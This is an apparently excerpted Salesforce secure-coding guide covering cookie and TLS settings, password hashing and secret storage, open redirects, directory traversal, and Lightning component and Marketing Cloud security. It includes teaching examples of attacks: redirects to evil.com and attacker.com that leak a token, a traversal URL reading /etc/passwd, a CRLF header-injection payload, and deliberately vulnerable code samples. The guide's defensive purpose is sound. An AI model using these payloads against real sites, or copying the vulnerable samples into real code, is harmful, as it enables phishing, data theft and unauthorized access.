SSL Labs publishes a list on its SSL server test page of the 10 most recent worst-rated sites. If your site
scores poorly, it shows up on that list for a while. If your site scores well, it can appear on the list of
recent best-rated sites.
An alternative SSL testing tool is SSLScan on GitHub.
<transport-guarantee>CONFIDENTIAL</transport-guarantee>
This signals to the container that user data must be kept confidential and implies the use of HTTPS
for this application. Some additional configuration is required to support SSL — see the
documentation specific to your web container.
– Apache Tomcat 5.5: http://tomcat.apache.org/tomcat-5.5-doc/ssl-howto.html
– Apache Tomcat 6.0: http://tomcat.apache.org/tomcat-6.0-doc/ssl-howto.html
The GlassFish application server supports secure session-cookie configuration in versions 2.1 and 3.0,
using the following syntax in sun-web.xml:
<?xml version="1.0" encoding="UTF-8"?>
<sun-web-app>
  <session-config>
    <cookie-properties>
      <property name="cookieSecure" value="[true|false|dynamic]"/>
    </cookie-properties>
  </session-config>
</sun-web-app>
The upcoming version of the Servlet Specification (Servlet 3.0) will provide additional support for
programmatic configuration of session cookie security using the new
javax.servlet.SessionCookieConfig class.
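To illustrate the attributes themselves, the JDK's java.net.HttpCookie class models the Secure and HttpOnly flags. A real servlet container sets them through its own session-cookie configuration, as in the examples above, so treat this as a sketch of the attributes rather than deployable server code; the cookie name is illustrative:

```java
import java.net.HttpCookie;

public class SecureCookieDemo {
    // Build a session cookie with the attributes security-critical cookies need.
    public static HttpCookie sessionCookie(String value) {
        HttpCookie cookie = new HttpCookie("JSESSIONID", value);
        cookie.setSecure(true);    // only ever sent over HTTPS
        cookie.setHttpOnly(true);  // not readable from page JavaScript
        cookie.setPath("/");
        return cookie;
    }
}
```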
• For PHP, always set the boolean parameter secure to true when calling setcookie. This
value is set to false by default.
Use session_regenerate_id when logging in users to prevent session fixation attacks.
For more guidance on PHP security, see:
– http://phpsec.org/projects/guide/4.html
• For Ruby on Rails, always set the boolean parameter secure to true when creating a
CGI::Cookie object. This value is set to false by default.
Use reset_session when logging in users to prevent session fixation attacks.
For more guidance on Ruby on Rails security, see https://guides.rubyonrails.org/security.html.
• For Apache, use the SSLCipherSuite directive with mod_ssl to configure available cipher suites.
Use only HIGH ciphers and disable SSLv2. For complete configuration information, see
http://httpd.apache.org/docs/2.0/mod/mod_ssl.html#sslciphersuite.
CHAPTER 7 Storing Sensitive Data
Understand sensitive data and learn how to employ robust encryption, access controls, and secure
storage solutions to protect it.
Hardcoded Secrets
Storing sensitive information in your application's source code isn’t advisable since anyone with access
to the code can view the secrets in clear text.
Debug Logs
Don’t include any sensitive data (usernames, passwords, names, contact information, opportunity
information, PII, and so on) in debug logs in Apex. This applies both to standard Salesforce logs
produced with System.debug() methods and to custom debug logs created by the application. Avoid
sending sensitive information to third parties by email or other means as part of reporting possible errors.
Salesforce.com Integrations
For external applications, ensure that no user credentials (usernames, passwords, or session IDs) are
stored in external databases. To integrate an external application with Salesforce.com user accounts,
use the OAuth flow. More information about implementing OAuth can be found here.
Sample Vulnerability
If your application copies and stores sensitive data that originated at salesforce.com, take extra precautions.
Salesforce.com treats data threats seriously, and a breach could impact your relationship with them if
you're a partner.
Storing passwords in plaintext or weakly hashed formats (like MD5) exposes your application to
widespread user exploitation if attackers gain database access (for example, through backup theft or
SQL injection). If attackers retrieve passwords through SQL injection or data exposure, they can
compromise user accounts on a large scale.
Is My Application Vulnerable?
If your application stores the salesforce.com user password, your application is vulnerable.
Collecting additional sensitive data renders your application non-compliant with industry standards,
potentially leading to significant privacy breaches and legal repercussions.
Therefore, developers have historically used a cryptographic hash function, a one-way function that is
(supposedly) computationally infeasible to reverse. They then store the hash output:
hash = md5 # or SHA1, or Tiger, or SHA512, etc.
storedPasswordHash = hash(password)
To authenticate users, the application hashes the provided password and compares it to the stored
password:
authenticated? = hash(password) == storedPasswordHash
The goal of adding a salt is to force attackers to compute a larger dictionary of hashes: they now have
to compute 2^saltSize hashes (for example, 2^16 for a 2-byte salt) for each item in their password dictionary.
However, a salted password hash only makes it more expensive to pre-compute the attack against a
large password database. It doesn’t protect from attempts to brute-force individual passwords when
the hash and salt are known. The main issue is the computing cost; a single round of MD5 or SHA-1 no
longer sufficiently slows down attackers. Fast, cheap and highly parallel computation on specialized
hardware or commodity compute clusters makes brute force search with a dictionary affordable and
accessible, even to adversaries with few resources.
Therefore, we need a solution that significantly slows down the attacker but doesn’t slow down our
application by too much. The idea is that we tune the hashing function to be pessimal; Provos and
Mazières use a modified form of the Blowfish cipher to pessimize its already-slow setup time. Using
bcrypt is a fine solution, but it’s also easy to build a tunably slow hash function using the standard library
of most programming languages.
The benefit of this approach is that it slows down the attacker greatly while costing the application
relatively little, since each login verifies only a single password candidate. (Additionally, since login
actions are such a small fraction of all application traffic, it’s OK if verification takes 0.5 seconds or more.)
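One way to build such a tunably slow, salted hash from a standard library is PBKDF2, which ships with the JDK. The parameters below are illustrative: raise the iteration count until hashing takes a noticeable fraction of a second on your production hardware.

```java
import java.security.GeneralSecurityException;
import java.security.MessageDigest;
import java.security.SecureRandom;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.PBEKeySpec;

public class SlowHash {
    // Illustrative tuning knobs; the iteration count is what makes
    // brute-force search expensive for the attacker.
    static final int ITERATIONS = 100_000;
    static final int KEY_BITS = 256;

    public static byte[] newSalt() {
        byte[] salt = new byte[16];
        new SecureRandom().nextBytes(salt);
        return salt;
    }

    public static byte[] hash(char[] password, byte[] salt) {
        try {
            PBEKeySpec spec = new PBEKeySpec(password, salt, ITERATIONS, KEY_BITS);
            return SecretKeyFactory.getInstance("PBKDF2WithHmacSHA256")
                    .generateSecret(spec).getEncoded();
        } catch (GeneralSecurityException e) {
            throw new IllegalStateException(e);
        }
    }

    // Constant-time comparison of the candidate against the stored hash.
    public static boolean verify(char[] password, byte[] salt, byte[] stored) {
        return MessageDigest.isEqual(hash(password, salt), stored);
    }
}
```

Store the salt and the hash, never the password itself; bcrypt or scrypt libraries are equally good choices where available.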
General Guidance
When storing sensitive information on a machine:
• All authentication secrets must be encrypted when stored on disk, including passwords, API Tokens,
and OAuth Tokens.
• Store secrets in vendor-provided key stores (macOS/iOS keychain, Android keystore, Windows DP-API
registry) for security compliance.
• For services running on servers that must boot without user interaction, store secrets in a database
encrypted with a key not available to the database process. The application layer provides the key
as needed to the database at runtime or decrypts/encrypts as needed in its own process space.
• Don’t store any cryptographic keys used for protecting secrets in your application code
• Be cautious of the algorithms and ciphers used in any cryptographic operations
• Salt hashes, and if possible store salts and hashes separately
• Use strong platform cryptographic solutions
• Check if frameworks/platforms have already addressed the problem
• Use SSL/TLS to transmit sensitive data
The following list provides you with the guidelines to protect your application:
• ASP.NET provides access to the Windows CryptoAPI and the Data Protection API (DPAPI). Use the
DPAPI for storage of sensitive information like passwords and encryption keys if the
DataProtectionPermission has been granted to the code. Generally, the machine key is used to encrypt
and decrypt sensitive data, with the risk that if the machine is compromised, malicious code could
potentially decrypt any stored secrets.
More information on this topic can be found here:
– Building Secure .NET Applications: Storing Secrets
– .NET Framework 4 Cryptographic Services
The best solution for ASP.NET is to use a hardware device like a cryptographic smartcard or Hardware
Security Module (HSM) with the underlying Crypto API and a vendor-supplied CSP.
• Java provides the KeyStore class for storing cryptographic keys. By default, a flat file on the server
is used, encrypted with a password. For this reason, an alternative Cryptographic Service Provider
(CSP) is recommended. The strongest solution for Java is to rely on hardware, such as a cryptographic
smartcard or Hardware Security Module (HSM), for securely storing cryptographic keys; these devices
are accessed through the vendor-supplied CSP configured in the java.security configuration file. For
more information on installing Java CSPs, consult the Java Cryptography Architecture (JCA) Reference
Guide. When not using a CSP, if the product is a client application, use Java bindings to store the
passphrase protecting the keystore in the vendor-provided key store. Never store the passphrase in
source code or in a property file. For server-side Java solutions, follow the general guidance of making
the passphrase protecting the keystore unavailable to the database process storing credentials.
A Java implementation of bcrypt is called jBCrypt.
• PHP generally doesn't provide cryptographically secure random number generators. Make use of
/dev/urandom as the source for random numbers.
Note: With the introduction of PHP 7, there is a built-in cryptographically secure random
number generator, random_int(). This function can be used for generating secure random
numbers in PHP 7 and later versions. See random_int.
Use the mcrypt library for cryptography operations. Salted hashes and salts could be subsequently
stored in a database.
A framework called phpass offers "OpenBSD-style Blowfish-based bcrypt" for PHP. For client apps,
you must use native bindings to store user secrets in the vendor-provided key store.
• For Ruby on Rails, there’s a copy of bcrypt called bcrypt-ruby. For client apps, you must use ruby
bindings to store secrets in the vendor provided key store.
• For Python, use a module that interacts with the vendor-provided keystores such as the python
keyring module.
• For Flash/Air apps, use the Encrypted Local Store that contains bindings to use vendor-provided
keystores to store secrets.
CHAPTER 8 Arbitrary Redirect
5. When Alice logs in, the application sends a redirect response to P, so Alice can get right back to
work:
HTTP/1.1 302 Found
Location: /someImportantAction.jsp
The problem arises when the application performs dynamic redirects to a user-controlled value, which
allows a malicious attacker to redirect users to any URL indiscriminately.
This allows an attacker to perform phishing attacks that look more legitimate, for example:
Legitimate redirect: https://www.example.com/home.jsp?retURL=login.jsp
The “retURL” parameter is dynamic and can easily be controlled by the user from the browser address
bar. If its value (login.jsp) is replaced with any other page or URL, the user is redirected to that page
or URL instead of the login page. Attacker-crafted URL:
https://www.example.com.fake.bad.co.uk/login.jsp
Another attacker-crafted URL percent-encodes the redirect target:
https://www.example.com/home.jsp?retURL=http%3A%2F%2Fwww.evil.com%2F
which decodes to
http://www.evil.com/
This URL looks like (and is) a true example.com URL but will actually send people to evil.com. If evil.com
hosts a convincing phishing attack page for example.com, example.com users may very well be tricked
into providing their credentials to evil.com.
Another risk is abusing redirects to leak sensitive data carried in GET requests via the Referer header.
This time let’s take a look at a client side redirect example:
https://example.com/index.jsp?secretToken=81dc9bdb52d04dc2003#auth.jsp
The redirect URL is part of the hash fragment and is used by client-side JavaScript to perform the
redirection to the desired page:
<script>
var retURL = location.hash.substring(1);
window.location = retURL;
</script>
The value can be controlled by the user, which means that an attacker can change it to redirect
to their own site:
https://example.com/index.jsp?secretToken=81dc9bdb52d04dc2003#http://attacker.com
The request will now be sent to “attacker.com” along with the Referer header value which is the URL of
the page that performed the redirect. In this case the Referer contains sensitive data that is now being
sent to the attacker.
Host: attacker.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0)
Gecko/20100101 Firefox/49.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com/index.jsp?token=3423434234
Depending on your application and on your application framework, arbitrary redirects may also cause
a response splitting vulnerability: if the attacker provides %0d%0a (\r\n) in the right request
parameter, and those characters make it into the HTTP Location: header, the attacker can control HTTP
headers after the insertion point and can control the HTTP response body. If the malicious request is:
https://www.example.com/login.jsp?page=something%0d%0aSet-Cookie:+some+evil+data
Sample Vulnerability
This C# code shows a simple example of an arbitrary redirect:
// ...
string url = Request.QueryString["url"];
// ...
Response.Redirect(url);
Is My Application Vulnerable?
If your application has a redirection mechanism and does not already address the problem by limiting
redirection (preferably by means of an allowlist, a mechanism that restricts redirects to known-good
URIs), then it is likely to be vulnerable.
if (!good)
    throw new Exception("Dubious host name in URL!");
Response.Redirect(url);
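A comparable check in Java parses the target, rejects CR/LF characters that could enable response splitting, and validates the host against an allowlist. The allowed hosts here are illustrative:

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.util.Set;

public class RedirectValidator {
    // Illustrative allowlist of hosts we are willing to redirect to.
    static final Set<String> ALLOWED_HOSTS = Set.of("www.example.com", "example.com");

    public static boolean isSafeRedirect(String url) {
        // Reject CR and LF outright: they could enable HTTP response splitting.
        if (url == null || url.contains("\r") || url.contains("\n")) {
            return false;
        }
        try {
            URI target = new URI(url);
            if (target.getScheme() == null) {
                // Relative URL: safe only if it is not scheme-relative
                // ("//evil.com/..." has no scheme but does have a host).
                return target.getHost() == null;
            }
            return "https".equals(target.getScheme())
                    && ALLOWED_HOSTS.contains(target.getHost());
        } catch (URISyntaxException e) {
            return false; // unparsable input is never safe
        }
    }
}
```

Relative paths are accepted because they stay on our own site, but scheme-relative URLs like //evil.com/ must be rejected explicitly.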
ASP.NET
Follow general guidance and audit any usage of Response.Redirect().
Java
Follow general guidance and audit any usage of HttpServletResponse.sendRedirect().
PHP
Follow general guidance and audit any usage of header('Location: <URL>') and fopen().
As an additional protection, the php.ini setting allow_url_fopen controls whether fopen() is allowed
to open URL schemes. If your code doesn't need to open remote URLs, set it to Off.
Ruby on Rails
Follow general guidance and audit any usage of redirect_to().
CHAPTER 9 Authorization and Access Control
Sample Vulnerability
Directory Traversal:
Consider the following URL:
https://www.example.com/index.php?page=login
A directory traversal attack to display the /etc/passwd file can be executed by changing the URL to:
https://www.example.com/index.php?page=../../../../../../../etc/passwd
Example response:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
In this sample the attacker gained read access to the /etc/passwd file.
Authorization:
Consider an HTTP request for an administrator to reset the password of a user:
POST /admin/resetPassword.jsp HTTP/1.1
Host: www.example.com
[HTTP Headers]
user=admin&newpassword=password
If an attacker could perform an identical request and the web application resets the admin account's
password, this is an example of bypassing an authorization mechanism because this capability was only
intended for administrators of www.example.com. In a sense, this is also a privilege escalation issue since
a non-administrator can perform administrative password reset functionality and obtain access to the
administrator account with the new password.
Is My Application Vulnerable?
It is not unusual for a web application to read, write, and execute files via scripts as part of the functionality
they provide. As with other input validation vulnerabilities, protecting against directory traversal requires
that developers take proactive steps to validate user input before it is executed. If this has not been done,
your application may be vulnerable.
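As a cross-language illustration of that proactive validation against directory traversal, one approach is to canonicalize the requested path and confirm it stays inside an allowed base directory; the base directory below is illustrative:

```java
import java.nio.file.Path;

public class PathGuard {
    // Illustrative base directory that served page files must live under.
    static final Path BASE = Path.of("/var/www/pages").normalize();

    // True only if the user-supplied name, after ".." segments are
    // resolved, still points inside BASE.
    public static boolean isInsideBase(String userInput) {
        Path resolved = BASE.resolve(userInput).normalize();
        return resolved.startsWith(BASE);
    }
}
```

Canonicalizing before the check matters: comparing the raw string would miss sequences like ../../../../etc/passwd.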
All web applications provide access to resources by definition. If your web application includes a login
page, has a logical division between roles/groups, and has functionality restricted to only certain types
of users such as administrators, your web application may be vulnerable unless carefully engineered.
Attackers can use spiders that locate hidden content and pages intended to be used only by authorized
users. Never assume an attacker does not know the entire layout of your web application.
Testing for authorization and access control vulnerabilities varies greatly from application to application.
In general, using a proxy and staying alert for information being passed about the logical roles, accounts,
and groups in a web application can identify how authorization and access control is enforced in a web
application. Conduct an investigation of the web application driven by questions like:
• What pages are used for authenticating a user?
• What roles/groups exist for the web application?
• What are the capabilities/resources of each role/group?
• What mechanisms are used to grant access to the role/group, and does it actively check that a
request is from an authenticated role/group member?
• What happens when incorrect role/group data is supplied to the mechanisms?
• What happens when the information of other role/group data is supplied to these mechanisms?
• What happens when a user of the site modifies their own role/group data with a proxy before
submission to a mechanism?
• What assumptions are being made and what does a member of the product security team think
about these assumptions?
Some commercial tools, such as IBM Rational AppScan, can differentiate between pages that only
certain roles can reach, though tools such as these are expensive. When configured with an
understanding of the divisions of your site, such a tool can attempt to detect authorization vulnerabilities
by recognizing when a role can access a page that should have been restricted to another role.
PHP's session mechanism can store authenticated session information for each user so that cross-checks
can be performed to determine whether that user should be allowed access to a given resource. The
caveat is that care must be taken when configuring sessions, since the defaults are insecure. Change
the following default settings in php.ini to the values below:
session.hash_function = 1
session.entropy_file = /dev/urandom
session.entropy_length = 64
PHP has a special setting in php.ini called open_basedir. This setting can be used to restrict PHP file
opening, writing, and deletion to a specified directory tree. By default this setting is turned off, and the
necessity to use it depends on your server configuration. For example, PHP running as an Apache module
on a secured configuration of Apache will inherit Apache's limited directory permissions, so it might not
be necessary to use it in that case. It can be used in the following manner:
open_basedir = '/home/www/public_html'
PHP's file-handling functions, such as fopen() and readfile(), take filenames as parameters; calls to
them should be traced back to verify that the parameters were properly validated.
If these functions are not required by your web application, it is possible to disable them in php.ini using
the disable_functions setting. This is a common technique to prevent command injection by blocking
a list of commands that might execute user data as instructions for a shell. It can be used in the following
manner:
disable_functions = fopen, readfile, system, exec, passthru,
shell_exec, proc_open
Another setting in php.ini that can be used is allow_url_include. This setting controls if files on remote
URLs can be included via include() and require(). If this is not necessary, it should be set to off.
CHAPTER 10 Lightning Security
Directive Summary
default-src 'self' Default policy that resources may be only loaded from the same domain
(lightning.force.com or lightning.com).
script-src 'self' Scripts may only be loaded from the same domain (no external script
loads). Use static resources to store all scripts.
'unsafe-inline' Inline JavaScript is not blocked by the CSP but is blocked in the security
review as future CSP settings will not allow unsafe-inline. Do not write
any code using inline JS in order to prevent your components from
malfunctioning when CSP is tightened.
object-src 'self' <object> <embed> and <applet> elements can only be loaded from
the same domain (use static resources).
style-src 'self' CSS styles can only be loaded from the same domain (use static
resources).
img-src 'self' Images can only be loaded from the same domain.
img-src 'http:' 'https:' 'data:' Images can only be loaded via http, https, or data URIs. The security
review requires https.
media-src 'self' Audio and video elements can only be loaded from the same domain.
frame-ancestors https: The page can be embedded only via an https parent frame.
font-src https: data: Fonts can be loaded via https and data URIs.
connect-src 'self' XHR callbacks and websockets can only connect back to the same
domain.
'unsafe-eval' eval() and related reflection operations are not blocked by the CSP but
are blocked in the AppExchange security review.
Note: As of Spring ’19 (API version 45.0), you can build Lightning components using two
programming models: the Lightning Web Components model, and the original Aura Components
model. Lightning web components are custom HTML elements built using HTML and modern
JavaScript. Lightning web components and Aura components can coexist and interoperate on a
page.
In addition to CSP directives, secure components also meet the following restrictions.
• Component attributes must not be changed during a render cycle, to avoid render loops. In Aura
components, modify attributes only from a controller method or a helper method called by a controller
method. Lightning web components should not modify their own attributes in a renderedCallback.
• Components must properly load resources like scripts and stylesheets instead of using script or
link tags. In Aura components, use the ltng:require component. In Lightning web components, use
the lightning/platformResourceLoader module.
• Components must not override native window or document functions. This applies to both Aura
components and Lightning web components.
• Inline JavaScript must only be used for methods in the component markup. For example, an Aura
component method: <div onmouseover="{!c.myControllerFunction}">foo</div>. A Lightning web
component method: <div onmouseover={myComponentFunction}>foo</div>.
You should also be familiar with the restrictions listed in Security with Lightning Locker.
When you submit a Lightning component or app for security review, include all source JavaScript files
in static resources, as we cannot review minified code directly. Failure to do so delays the review of your
components until we get the appropriate source files. This also applies to sources that compile to
JavaScript.
Component Security Boundaries and Encapsulation
In Apex, every method that is annotated @AuraEnabled should be treated as a webservice interface.
That is, the developer should assume that an attacker can call this method with any parameter, even if
the developer's client-side code does not invoke the method or invokes it using only sanitized parameters.
Therefore the parameters of an @AuraEnabled method should:
• not be placed into a SOQL query unsanitized
• not be trusted to specify which fields and objects a user can access
Whenever an @AuraEnabled method modifies sObjects, full CRUD/FLS as well as sharing checks should
be made to ensure that the client does not elevate their privileges when invoking this method. These
checks need to be performed on the server (in Apex). Note that this is different than the situation with
Visualforce, in which CRUD/FLS checks can be performed for you by the Visualforce presentation layer.
This means porting code from Visualforce to Lightning requires the addition of CRUD/FLS checks each
time an sObject is accessed.
Because Lightning components are meant to be re-usable and shareable, each global or public attribute
should be viewed as untrusted from the point of view of the component's internal logic. In other words,
don't take the contents of an attribute and render them directly to the DOM via innerHTML or $().html().
It does not matter whether, in your app, the attributes are provided by another component you control.
When you need to perform a raw HTML write or set an href attribute, the attribute must first be sanitized in your JavaScript code.
An important aspect to understand is how session authentication works for your AuraEnabled
components. If an Experience Cloud site user's session expires, and the rendered page contains Lightning
components that can invoke custom Apex methods (AuraEnabled), the methods are invoked as the
site's guest user. Plan your implementation to either provide/revoke access to the site guest user or to
monitor for session time-outs to invoke login requests as needed.
Access Control in Apex Controllers and Supporting Classes
When Lightning components invoke server-side controllers, the developer must ensure that the server-side
read/write operations don’t subvert the organization's security policy as set by the user's profile and
sharing permissions. All access control enforcement must occur server-side, because the client is under
the control of the attacker. Fortunately you can ensure that your server-side code is safe to use with
Lightning components by taking some additional steps when writing your Apex classes.
Sharing in Apex Classes
74
Lightning Security
All controller classes must have the with sharing keyword. There are no exceptions. In some cases,
your code needs to elevate privileges beyond those of the logged in user. For example, you may have
a method that returns summary data computed over fields that the logged-in user cannot access. In this
case, the controller must still use the with sharing keyword, but a specific Aura-enabled method
may call a helper method in a class that is explicitly marked without sharing. All privileged operations
should be placed into these helper classes, and each privileged helper class should perform a single
privileged function and no unprivileged functions. All other classes must be with sharing.
public with sharing class ExpenseController { //Unsafe
    @AuraEnabled
    public static String getSummary() {
        doPrivilegedOp(); //should not be here
    }
}

public with sharing class ExpenseController { //Safe
    @AuraEnabled
    public static String getSummary() {
        HelperClass.doPrivilegedOp(); //privileged code isolated in a without sharing helper
    }
}
Avoid ambiguous sharing policies that make auditing difficult, particularly in large apps with complex
control flows. Write apps in such a way that an auditor who looks at a class that performs a database
operation can quickly and accurately determine if the database operation respects user permissions. All
global classes and classes that expose webservices or allow remote invocation (such as Aura-enabled
classes and remote action classes) must always use the with sharing keyword. The exception is
for controller classes in sites, including Experience Cloud sites, where a with sharing policy could
force the granting of excessive permissions to guest users.
CRUD/FLS Enforcement
CRUD/FLS permissions aren’t automatically enforced in Lightning components or controllers. You can’t
rely on Lightning components to enforce security as the client is under the control of the attacker, so all
security checks must always be performed server-side. You must explicitly check for isAccessible(),
isUpdateable(), isCreateable(), and isDeletable() prior to performing these
operations on sObjects.
public with sharing class ExpenseController {
    @AuraEnabled
    public static List<ns__Expense__c> get_UNSAFE_Expenses() { //vulnerable: no FLS check
        return [SELECT Id, Name, ns__Amount__c, ns__Client__c, ns__Date__c,
            ns__Reimbursed__c, CreatedDate FROM ns__Expense__c];
    }

    @AuraEnabled
    public static List<ns__Expense__c> getExpenses() { //safe
        String [] expenseAccessFields = new String [] {'Id',
            'Name',
            'ns__Amount__c',
            'ns__Client__c',
            'ns__Date__c',
            'ns__Reimbursed__c',
            'CreatedDate'
        };
        // Obtain the field name/token map for the Expense object
        Map<String,Schema.SObjectField> m =
            Schema.SObjectType.ns__Expense__c.fields.getMap();
        for (String fieldToCheck : expenseAccessFields) {
            // Check if the user has read access to this field
            if (!m.get(fieldToCheck).getDescribe().isAccessible()) {
                throw new System.NoAccessException();
            }
        }
        return [SELECT Id, Name, ns__Amount__c, ns__Client__c, ns__Date__c,
            ns__Reimbursed__c, CreatedDate FROM ns__Expense__c];
    }
}
Note that validation in the Aura-enabled server-side controller is also insufficient, as users can use the SOAP/REST API to modify objects directly, bypassing both the Apex controller and the UI.
Object Validation Concerns
When Aura enabled methods receive objects as input types, you must validate the fields within those
objects, since any fields could be set by the client. Here’s a typical vulnerable example.
@AuraEnabled
public static Account insertAccount(Account a){
    // We expect only Name to be set
    if(Schema.SObjectType.Account.fields.Name.isUpdateable()){
        insert a; // <== problem: if Account "a" includes other standard
                  // or custom fields, they will also be set
        return a;
    }
    return null;
}
To do this, you must iterate through all populated fields and check FLS on those fields.
@AuraEnabled
public static Account respectFLS(Account a){
    Map<String, Schema.SObjectField> fieldMap =
        Schema.SObjectType.Account.fields.getMap();
    Map<String, Object> fieldsToValue = a.getPopulatedFieldsAsMap();
    for(String fieldKey : fieldsToValue.keySet()) {
        // if this populated field is not updateable, throw an error
        if(!fieldMap.get(fieldKey).getDescribe().isUpdateable()) {
            throw new SecurityException('Invalid fields');
        }
    }
    insert a;
    return a;
}
CSRF
The key is that the DML operation must not be performed without an event stemming from human interaction, such as a click. CSRF only applies to server-side DML operations, not operations that update client-side component attributes.
Cross Site Scripting
Component markup is rendered differently than standard Visualforce markup (which is rendered
server-side) or javascript micro-templating frameworks (which are usually rendered with innerHTML).
In Lightning, component markup must be valid xhtml, and the markup is parsed and rendered to the
DOM with standard DOM accessors such as setAttribute and textContent. Therefore no html parsing
occurs during component markup rendering, and there is no possibility of breaking out of attribute
values or nodeValues. When attributes are interpolated into markup, they can only occur as attribute
values or the text content of DOM nodes. Lightning attribute values cannot be inserted as attribute
names, or portions of attribute values. This means certain constructions that would be valid in Visualforce
or most micro-templating frameworks are invalid aura expressions, and most of the remaining
constructions are automatically safe:
<div>Here is a <b> {!v.myvalue} </b> bold value</div> <!-- always
safe-->
<div title="{!v.myvalue}">a div</div> <!-- always safe-->
<div {!v.myvalue}>a div</div> <!-- will not compile-->
<div title="Here is a {!v.myvalue}">a div</div> <!-- will not
compile -->
<div title="{!'Here is a ' + v.myvalue}">a div</div> <!-- always
safe-->
Because of this, no encoding is ever performed by the framework when rendering component markup,
nor are any encoding functions provided by the framework.
However, there is still the possibility of using unsafe attributes:
<a href="{!v.foo}">click</a> //unsafe: foo=javascript:..
<iframe src="{!v.foo}"/> //unsafe: foo=javascript:..
The following is a partial list of unsafe combinations of tags and attributes that should be avoided, where possible, within Lightning component markup, so that unsafe values aren't assigned to Lightning attributes:
This is only a partial list. See html5sec.org for more information about possible unsafe attributes. Of the
above unsafe constructions, two are commonly used in component markup, namely anchor tags as well
as style tags. There are several options for sanitizing these attributes.
Anchor tags can be sanitized when relative URLs are used:
<a href="{!v.foo}">click</a> //unsafe: foo=javascript:..
<a href="{!'/' + v.foo}">click</a> //forces scheme to be https or
http
with controller:
({
    sanitizeUrl : function(cmp, event, helper) {
        var el = document.createElement('a');
        el.href = ('getParam' in event) ?
            event.getParam('value') : cmp.get('v.attr');
        if (el.protocol !== 'https:') {
            cmp.set('v.attr', ' ');
        }
    }
})
Note that the scheme is parsed by the browser rather than with string handling functions. Also note
that both the init and change events must be filtered to make sure that only controlled schemes are
rendered or re-rendered in your component's markup.
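The same scheme check can also be expressed with the standard URL constructor, which, like the anchor-element technique, lets the browser parse the scheme rather than string-handling functions. This is a sketch; the base URL is a hypothetical placeholder, not a real org domain:

```javascript
// Returns true only for http(s) URLs. Relative URLs resolve against
// the (hypothetical) base and therefore inherit its https scheme.
function isSafeHref(value) {
  var url;
  try {
    url = new URL(value, "https://example.my.salesforce.com/");
  } catch (e) {
    return false; // unparseable input is rejected
  }
  return url.protocol === "https:" || url.protocol === "http:";
}
```

With this check, isSafeHref("javascript:alert(1)") is rejected while relative paths and http(s) URLs pass.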
Because the binding between component markup and lightning attributes is automatic, unless you
intercept value changes, your code cannot sanitize attributes set from outside your component. Moreover,
it is a bad practice to rely on the code that instantiates or interacts with your component to pass you
safe values. Relying on the caller to give you data that is safe creates a security dependency between
the internal structure of your component and all of the possible callers. In large applications, this typically
results in failure to sanitize some input.
Because the above sanitization technique is heavyweight, it is preferable to use only relative URLs in
component markup, or to use only private attributes (for example, if the URL is pulled from a URL type
on the server).
For style tags, CSS as a language is difficult to sanitize in a way that prevents style injection. Moreover, the 'type' fields within Lightning attributes are not enforced; for example, a field marked 'Boolean' may well contain strings. Therefore it is a bad practice to pass attribute values to style tags. Instead, use tokens, private attributes, or JavaScript to manage style changes.
Within javascript, the same cross site scripting issues are possible as with any other javascript code. Be
aware that no encoding functions are provided, so if you must use html rendering functions, then place
a third-party encoding library such as secureFilters into your helper (loading this library via static resources
creates some race conditions that add complexity to your code). Then, use the secureFilters.html function
to sanitize external data passed to rendering functions or third-party libraries that use rendering functions:
rerender: function(cmp, event, helper) {
    var el = cmp.find("xyz").getElementById("abc");
    var myattr = cmp.get("v.myattr");
    el.innerHTML = "<b>" + myattr + "</b>"; //unsafe
    el.innerHTML = "<b>" + helper.secureFilters.html(myattr) + "</b>"; //safe
}
and place the secureFilters code into your helper. Alternately, use an html encoding function that
performs the same substitution operations as secureFilters' html() function.
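For reference, the kind of substitutions a secureFilters-style html() function performs can be sketched as follows. This is an illustrative stand-in, not the actual library code:

```javascript
// Encode the characters that can change HTML parsing context
// (&, <, >, ", ', `) as numeric character references.
function htmlEncode(input) {
  return String(input).replace(/[&<>"'`]/g, function (ch) {
    return "&#" + ch.charCodeAt(0) + ";";
  });
}
```

Encoded output is safe to concatenate into text content or quoted attribute values, because none of the context-changing characters survive.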
If in the future, encoding functions are provided natively by the framework, this section will be updated
with new instructions. Don’t roll your own encoding functions.
Don’t rely on CSP to prevent XSS, as the presence of CSP policies will depend on how your component
is surfaced and what the organization's policies are, which is subject to change at runtime. Additionally,
CSP will not protect your code from html or style injection.
For more information about general XSS issues, see our Secure Coding Guidelines on page 4.
Arbitrary Redirect
When redirecting to a third-party site:
1. Use HTTPS.
2. Ensure that the domain is hard coded into the source or stored in a custom setting. Storing the
domain in a custom object field is not considered sufficient protection.
Secret Inputs
In Visualforce, user password entry should be performed with <apex:inputSecret> tags. The
Lightning equivalent for this is the <ui:inputSecret /> component.
Third-Party Frameworks
Check out this blogpost about using third-party frameworks within Lightning Locker.
CHAPTER 11 Marketing Cloud Engagement API
Integration Security
For the most part we treat the Marketing Cloud Engagement API as any other API that you can integrate
your Salesforce apps with. Here are a few additional things to keep in mind as you design and develop
your integration:
Enforce least privilege
Make sure to request the minimum required scope for your app's OAuth API token. This follows the principle of least privilege and reduces the risk associated with the API token.
Secure storage
Make sure to store only the refresh token on your external web server, to keep the access token only in memory, and to request a new access token when needed. Follow industry best practice for secure storage of the refresh token on the external platform you are using. The refresh token should be treated like a Salesforce credential.
Secure in transit
Make sure to always enforce TLS when making API calls to the MC APIs. Make sure to only provide the
access token as the Authorization header and never as query parameters. Make sure to maintain up to
date TLS configurations on your external web server.
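As a small sketch of the "Authorization header, never query parameters" rule (the endpoint URL and function name are hypothetical):

```javascript
// Build request options that carry the access token only in the
// Authorization header, never in the URL or query string.
function buildApiRequest(endpoint, accessToken) {
  return {
    url: endpoint, // token must not appear here
    headers: { Authorization: "Bearer " + accessToken }
  };
}
```

Tokens in query strings tend to leak through server logs, proxies, and Referer headers; the header keeps them out of those paths.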
Prohibited API endpoints
Please do not make use of the XML API. This API is no longer supported and is not compatible with
Enterprise 2.0 accounts. The AppExchange does not allow apps that make use of the XML API on the
marketplace.
https://help.exacttarget.com/en/technical_library/xml_api/exacttarget_xml_api_technical_reference/
For general guidelines around web application pentesting for your composite app, review the OWASP
